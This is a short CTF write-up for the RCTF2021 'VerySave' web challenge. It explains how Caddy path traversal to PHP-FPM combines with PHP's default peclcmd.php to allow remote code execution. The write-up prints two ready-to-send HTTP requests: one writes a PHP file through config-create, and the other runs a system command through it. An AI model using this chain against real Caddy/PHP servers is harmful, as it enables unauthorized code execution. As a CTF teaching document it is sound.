Tags: caddy web rce php 

Rating: 4.5

# VerySave

## How to Setup Environment

`cd docker && docker-compose up -d`

## Write Up

I learn a funny issue from [2-and-a-bit-of-magic](https://speakerdeck.com/greendog/2-and-a-bit-of-magic)

Caddy before 2.4.2 can path traversal in PHP-FPM

At the same time, I think of [MeowWorld in 巅峰极客](https://www.anquanke.com/post/id/218977#h2-3) and [camp-ctf-2015](https://web.archive.org/web/20201022203937/https://khack40.info/camp-ctf-2015-trolol-web-write-up/). Great thanks to them, I made a fun challenge.

register_argc_argv is TRUE in default PHP docker configuration and peclcmd.php is in default PHP docker.

### Exploit

```
GET /../usr/local/lib/php/peclcmd.php?+config-create+/tmp//*+/srv/qqqq.php HTTP/1.1
Host: test.local:54120
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

```

And then

```
POST /../tmp/qqqq.php HTTP/1.1
Host: test.local:54120
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

1=system('/readflag');
```

Original writeup (https://github.com/ccreater222/my-ctf-challenges/tree/master/RCTF2021/VerySafe).